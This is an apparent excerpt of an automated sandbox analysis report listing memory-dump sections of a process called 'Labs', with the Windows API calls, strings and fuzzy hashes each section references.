                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: FreeFromProgTask_memset$CreateInitializeInstanceSecuritylstrcmpi
                                                    • String ID: NULL Pointer assignment
                                                    • API String ID: 1300414916-2785691316
                                                    • Opcode ID: 309649e9c0f668b779df942587f94db3df639e1a8f5f50be232ad1c0fe43f0e8
                                                    • Instruction ID: 32e9e797b426423b123a78f26b699212522653ac27235ed2b9d93ac72c0c8438
                                                    • Opcode Fuzzy Hash: 309649e9c0f668b779df942587f94db3df639e1a8f5f50be232ad1c0fe43f0e8
                                                    • Instruction Fuzzy Hash: CD913871D01229EBDB10DFA5D844EDEBBB9FF08310F10815AF519A7241EB75AA45CFA0
                                                    APIs
                                                    • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 007F7449
                                                    • SendMessageW.USER32(?,00001036,00000000,?), ref: 007F745D
                                                    • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 007F7477
                                                    • _wcscat.LIBCMT ref: 007F74D2
                                                    • SendMessageW.USER32(?,00001057,00000000,?), ref: 007F74E9
                                                    • SendMessageW.USER32(?,00001061,?,0000000F), ref: 007F7517
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$Window_wcscat
                                                    • String ID: SysListView32
                                                    • API String ID: 307300125-78025650
                                                    • Opcode ID: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
                                                    • Instruction ID: f271f8ef8bc1472975a0a9aa3c3ccdaa37cae53d00aaadab30bf4a98ff196149
                                                    • Opcode Fuzzy Hash: 3f4812be9bbcd736576518d9c9a3a46acdc20fd741a846e366213b5cd9ac517c
                                                    • Instruction Fuzzy Hash: 0F41C370A0434CAFEB219F64CC85BFE77A9EF08350F10442AFA54E7291D6759D84DB60
                                                    APIs
                                                      • Part of subcall function 007D4148: CreateToolhelp32Snapshot.KERNEL32 ref: 007D416D
                                                      • Part of subcall function 007D4148: Process32FirstW.KERNEL32(00000000,?), ref: 007D417B
                                                      • Part of subcall function 007D4148: FindCloseChangeNotification.KERNEL32(00000000), ref: 007D4245
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF08D
                                                    • GetLastError.KERNEL32 ref: 007EF0A0
                                                    • OpenProcess.KERNEL32(00000001,00000000,?), ref: 007EF0CF
                                                    • TerminateProcess.KERNEL32(00000000,00000000), ref: 007EF14C
                                                    • GetLastError.KERNEL32(00000000), ref: 007EF157
                                                    • CloseHandle.KERNEL32(00000000), ref: 007EF18C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Process$CloseErrorLastOpen$ChangeCreateFindFirstHandleNotificationProcess32SnapshotTerminateToolhelp32
                                                    • String ID: SeDebugPrivilege
                                                    • API String ID: 1701285019-2896544425
                                                    • Opcode ID: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
                                                    • Instruction ID: 8c240dee3e668bda4c5af0c0f04af8e0d087ba133ea34205e3bf6200ebc0299e
                                                    • Opcode Fuzzy Hash: db414b98e3e5d651b3bc4dbf15c0da08480bf225c21d7995bf2b32b0772f3d30
                                                    • Instruction Fuzzy Hash: C0419A31301205DFDB25EF25CC99F6DB7A5AF88714F08841DF9469B292DB78A804CB96
                                                    APIs
                                                    • LoadIconW.USER32(00000000,00007F03), ref: 007D357C
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: IconLoad
                                                    • String ID: blank$info$question$stop$warning
                                                    • API String ID: 2457776203-404129466
                                                    • Opcode ID: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
                                                    • Instruction ID: 289ce6bf725a244139e50981e13f8cd2be2cd188a72439f952d83cefa4a6f80b
                                                    • Opcode Fuzzy Hash: 3410e9f9c325f89cb968d374d0a1673faf84ef8882598a71385ac2be5642fb7e
                                                    • Instruction Fuzzy Hash: 4D113D71649756FEEB004A34FC82D6A77BCEF05360B20001BF91196381E7AC7F5046A6
                                                    APIs
                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000100,00000000), ref: 007D4802
                                                    • LoadStringW.USER32(00000000), ref: 007D4809
                                                    • GetModuleHandleW.KERNEL32(00000000,00001389,?,00000100), ref: 007D481F
                                                    • LoadStringW.USER32(00000000), ref: 007D4826
                                                    • _wprintf.LIBCMT ref: 007D484C
                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 007D486A
                                                    Strings
                                                    • %s (%d) : ==> %s: %s %s, xrefs: 007D4847
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: HandleLoadModuleString$Message_wprintf
                                                    • String ID: %s (%d) : ==> %s: %s %s
                                                    • API String ID: 3648134473-3128320259
                                                    • Opcode ID: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
                                                    • Instruction ID: 8fc0ab0db6bb1e05cebd9b8b511c8e9658e10d7faa7dffa6fa9b888518631ab5
                                                    • Opcode Fuzzy Hash: 3ddc3374a0ebb4ac5c1b61b62cc15b1e22724e45b564789c60845b171ac0678e
                                                    • Instruction Fuzzy Hash: 7D012CF69003487BE75197A09D89FE7766CEB08300F400596B759E2141EA749E844F75
                                                    APIs
                                                      • Part of subcall function 007729E2: GetWindowLongW.USER32(?,000000EB), ref: 007729F3
                                                    • GetSystemMetrics.USER32(0000000F), ref: 007FDB42
                                                    • GetSystemMetrics.USER32(0000000F), ref: 007FDB62
                                                    • MoveWindow.USER32(00000003,?,?,?,?,00000000,?,?,?), ref: 007FDD9D
                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 007FDDBB
                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 007FDDDC
                                                    • ShowWindow.USER32(00000003,00000000), ref: 007FDDFB
                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 007FDE20
                                                    • DefDlgProcW.USER32(?,00000005,?,?), ref: 007FDE43
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: Window$MessageMetricsSendSystem$InvalidateLongMoveProcRectShow
                                                    • String ID:
                                                    • API String ID: 1211466189-0
                                                    • Opcode ID: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
                                                    • Instruction ID: c27f601372e5b31d8248f159a96ebbc5abc9a36e19aa032a0681035f86cc2496
                                                    • Opcode Fuzzy Hash: 9092991795688a3754f108a901988633ff8ce4e0696a1ee7a2a5d44b152b6d3c
                                                    • Instruction Fuzzy Hash: E8B19C71600219EFDF24CF69C9897BD7BB2BF44701F088169EE489E255D739AD50CBA0
                                                    APIs
                                                      • Part of subcall function 00781A36: _memmove.LIBCMT ref: 00781A77
                                                      • Part of subcall function 007F147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,007F040D,?,?), ref: 007F1491
                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 007F044E
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: BuffCharConnectRegistryUpper_memmove
                                                    • String ID:
                                                    • API String ID: 3479070676-0
                                                    • Opcode ID: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
                                                    • Instruction ID: dd34bf8c5b18e8f72184cb7fd3c359d1cb03db42a2b2253fc9322018acc15c81
                                                    • Opcode Fuzzy Hash: bc531d3b807c095fb5fe8f507ea0cf5088557211816e25fb7ea52019880726d0
                                                    • Instruction Fuzzy Hash: B0A14870204205DFCB20EF24C885B7EB7E5AF84314F14891DF6969B392DB39A955CF92
                                                    APIs
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 00772E9F
                                                    • ShowWindow.USER32(FFFFFFFF,00000000,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000,000000FF), ref: 00772EE7
                                                    • ShowWindow.USER32(FFFFFFFF,00000006,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC55B
                                                    • ShowWindow.USER32(FFFFFFFF,?,00000000,00000000,?,007AC508,00000004,00000000,00000000,00000000), ref: 007AC5C7
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: ShowWindow
                                                    • String ID:
                                                    • API String ID: 1268545403-0
                                                    • Opcode ID: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
                                                    • Instruction ID: c03f45f71f4f568d94fa82a84ff9c4dcc82bdb4abfe08221a52dcee99985cca6
                                                    • Opcode Fuzzy Hash: 496afa9d15a57d37437a2debf4bc9eca57062f6f98026c2387305b8bd57e209a
                                                    • Instruction Fuzzy Hash: 8941DB30604780AEDF764728888CB7A7B92BBD3340F28C51DF4AB46562C7BDE852DB15
                                                    APIs
                                                    • InterlockedExchange.KERNEL32(?,000001F5), ref: 007D7698
                                                      • Part of subcall function 00790FE6: std::exception::exception.LIBCMT ref: 0079101C
                                                      • Part of subcall function 00790FE6: __CxxThrowException@8.LIBCMT ref: 00791031
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 007D76CF
                                                    • EnterCriticalSection.KERNEL32(?), ref: 007D76EB
                                                    • _memmove.LIBCMT ref: 007D7739
                                                    • _memmove.LIBCMT ref: 007D7756
                                                    • LeaveCriticalSection.KERNEL32(?), ref: 007D7765
                                                    • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 007D777A
                                                    • InterlockedExchange.KERNEL32(?,000001F6), ref: 007D7799
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                    • String ID:
                                                    • API String ID: 256516436-0
                                                    • Opcode ID: c5c5c707b160321bc04e80ab441093beac3b5f252e69b80b31273f5f5b824c01
                                                    • Instruction ID: dc4ac910213afd3ef0e40e983d2bc4808ca3411ccaa925420397286992de07bc
                                                    • Opcode Fuzzy Hash: c5c5c707b160321bc04e80ab441093beac3b5f252e69b80b31273f5f5b824c01
                                                    • Instruction Fuzzy Hash: 5E315E71904209EFCF50EF64DC89EAEB778FF45710F1480A6F904AA256EB349A54DBA0
                                                    APIs
                                                    • DeleteObject.GDI32(00000000), ref: 007F6810
                                                    • GetDC.USER32(00000000), ref: 007F6818
                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 007F6823
                                                    • ReleaseDC.USER32(00000000,00000000), ref: 007F682F
                                                    • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 007F686B
                                                    • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 007F687C
                                                    • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,007F964F,?,?,000000FF,00000000,?,000000FF,?), ref: 007F68B6
                                                    • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 007F68D6
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                    • String ID:
                                                    • API String ID: 3864802216-0
                                                    • Opcode ID: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
                                                    • Instruction ID: bdd9496d4d2feb8075cc181b8853fdb19a9fe17d2f6eb6d32272f9c85fd697b1
                                                    • Opcode Fuzzy Hash: 53fa6ba45f5a167d9f90261e617da4e151cd01d39584068f1075b3e8975376a3
                                                    • Instruction Fuzzy Hash: 4A316B72101614BFEB118F14CC8AFEA3BAEFF49761F044065FE089A291D67A9851CBB0
                                                    APIs
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memcmp
                                                    • String ID:
                                                    • API String ID: 2931989736-0
                                                    • Opcode ID: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
                                                    • Instruction ID: 4fc1fdc9beda21869b0f43d2d57c285cb9ea978b3906c62ca27f1badaec21b8b
                                                    • Opcode Fuzzy Hash: 742f0ff45ff8c515f78aae37ef70cda36736a4b60207958a51f300cc917cfcf3
                                                    • Instruction Fuzzy Hash: 9121DA73A45106BAE606B5105D46FAB375CEE21754F08402CFD0AE6382EB1CDE21C6A1
                                                    APIs
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                      • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                    • _wcstok.LIBCMT ref: 007DF2D7
                                                    • _wcscpy.LIBCMT ref: 007DF366
                                                    • _memset.LIBCMT ref: 007DF399
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                    • String ID: X
                                                    • API String ID: 774024439-3081909835
                                                    • Opcode ID: 803cc413d866441c9d2af681652a8e1ddb9fcd910e6031db0678fdc2a9006022
                                                    • Instruction ID: efc896a5d4a852f1cf381eec0b5cedd94cc120a723a34d56e0c2ce8ff457dde6
                                                    • Opcode Fuzzy Hash: 803cc413d866441c9d2af681652a8e1ddb9fcd910e6031db0678fdc2a9006022
                                                    • Instruction Fuzzy Hash: CCC17B71604341DFC714EF64D889A5AB7E4BF84350F40892EF89A973A2DB38EC45CB92
                                                    APIs
                                                    • __WSAFDIsSet.WSOCK32(00000000,?,00000000,00000000,?,00000064,00000000), ref: 007E72EB
                                                    • #17.WSOCK32(00000000,?,?,00000000,?,00000010), ref: 007E730C
                                                    • WSAGetLastError.WSOCK32(00000000), ref: 007E731F
                                                    • htons.WSOCK32(?,?,?,00000000,?), ref: 007E73D5
                                                    • inet_ntoa.WSOCK32(?), ref: 007E7392
                                                      • Part of subcall function 007CB4EA: _strlen.LIBCMT ref: 007CB4F4
                                                      • Part of subcall function 007CB4EA: _memmove.LIBCMT ref: 007CB516
                                                    • _strlen.LIBCMT ref: 007E742F
                                                    • _memmove.LIBCMT ref: 007E7498
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                    • String ID:
                                                    • API String ID: 3619996494-0
                                                    • Opcode ID: 466e45dffbecbda8e6399ca5a5ff8a71fc2251cc7097501b326e7e3b53fbf1d8
                                                    • Instruction ID: 01eee5dc44c8f22c097ac5d2e9d29f3b06dfb4d3598cc16d35a4b01777694ff9
                                                    • Opcode Fuzzy Hash: 466e45dffbecbda8e6399ca5a5ff8a71fc2251cc7097501b326e7e3b53fbf1d8
                                                    • Instruction Fuzzy Hash: 5E81C171108280EBC714EB25DC8AF6AB7E8EF89714F14851CF5559B2D2EB78DD01CBA2
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
                                                    • Instruction ID: b7810d50231ee6a3a497255a6c06b8f448abfce2818169a24ccfb830368a627c
                                                    • Opcode Fuzzy Hash: a9ed68bf357b021fd6aa1477029b92f1db550b56682a22e8d1788a4d28444578
                                                    • Instruction Fuzzy Hash: CE714D30900209EFDF14CF58CC49AAEBB79FF86354F54C159F919AA251C738AA51CFA1
                                                    APIs
                                                    • IsWindow.USER32(01204CE8), ref: 007FBA5D
                                                    • IsWindowEnabled.USER32(01204CE8), ref: 007FBA69
                                                    • SendMessageW.USER32(00000000,0000041C,00000000,00000000), ref: 007FBB4D
                                                    • SendMessageW.USER32(01204CE8,000000B0,?,?), ref: 007FBB84
                                                    • IsDlgButtonChecked.USER32(?,?), ref: 007FBBC1
                                                    • GetWindowLongW.USER32(01204CE8,000000EC), ref: 007FBBE3
                                                    • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 007FBBFB
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                    • String ID:
                                                    • API String ID: 4072528602-0
                                                    • Opcode ID: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
                                                    • Instruction ID: 9d16586557522b4c76ce05cdb2849b434e370735bad14a2d3c43c03c54fe353f
                                                    • Opcode Fuzzy Hash: 2a87e75b8111d4cbd4052b361112d6cd71923e73de3e3e32c9467a32cadfce4d
                                                    • Instruction Fuzzy Hash: 2471BB74604208EFDB259F64C894FBABBB9FF49300F148059EB55973A1CB3AAC50DB60
                                                    APIs
                                                    • _memset.LIBCMT ref: 007EFB31
                                                    • _memset.LIBCMT ref: 007EFBFA
                                                    • ShellExecuteExW.SHELL32(?), ref: 007EFC3F
                                                      • Part of subcall function 00774D37: __itow.LIBCMT ref: 00774D62
                                                      • Part of subcall function 00774D37: __swprintf.LIBCMT ref: 00774DAC
                                                      • Part of subcall function 0078436A: _wcscpy.LIBCMT ref: 0078438D
                                                    • GetProcessId.KERNEL32(00000000), ref: 007EFCB6
                                                    • CloseHandle.KERNEL32(00000000), ref: 007EFCE5
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000013.00000002.2255906957.0000000000771000.00000020.00000001.01000000.00000006.sdmp, Offset: 00770000, based on PE: true
                                                    • Associated: 00000013.00000002.2255889922.0000000000770000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000800000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2255972069.0000000000826000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256017009.0000000000830000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000013.00000002.2256035027.0000000000839000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_19_2_770000_Labs.jbxd
                                                    Similarity
                                                    • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                    • String ID: @
                                                    • API String ID: 3522835683-2766056989
